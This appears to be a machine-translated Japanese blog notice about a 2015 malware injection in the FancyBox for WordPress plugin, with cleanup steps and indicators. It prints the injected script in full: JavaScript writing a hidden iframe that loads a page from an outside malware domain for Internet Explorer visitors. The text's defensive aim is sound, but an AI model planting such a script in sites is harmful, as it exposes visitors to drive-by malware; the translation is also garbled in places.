今週初めのウェブサイトやブログの数を WordPress、から警告を受け取りました マルウェア感染 スルー グーグルのウェブマスター.
に問題 グーグルのウェブマスター の存在であると称される タラ / スクリプト iframeマルウェア ソースのウェブサイト。
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>それがあると思われる 脆弱性 a プラグインアキ FancyBox for WordPress これは昨日まで(05.02.2015)は長い間更新されていませんでした。
この問題を解決し、 ウイルスサイトを消毒 このマルウェアは比較的簡単です。
1.FancyBoxプラグインを無効にします。
2。 FTPからすべてのFancyBoxプラグインファイルをサーバーから削除する
3.新しいバージョンのプラグインをインストールします(Fancybox 3.0.4)
WordPressの3.0.4用Fancybox
-3.0.3に記載されているセキュリティ問題の影響を受ける設定の名前を変更しました。 これにより、悪意のあるコードを削除せずに、プラグインが更新されたサイトに悪意のあるコードが表示されなくなります。
WordPressの3.0.3用Fancybox
– セキュリティ上の問題を修正しました.
マルウェア情報:
TYPE:インラインフレームのリダイレクト
TARGET:WordPressファンシーボックス
マルウェアDOMAIN:203koko.eu
マルウェアURI:http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAWコード:
書かれたマルウェア: if (navigator.userAgent.match(/msie/i)) { document.write(‘
WordPressのウェブサイトからマルウェアを削除する.
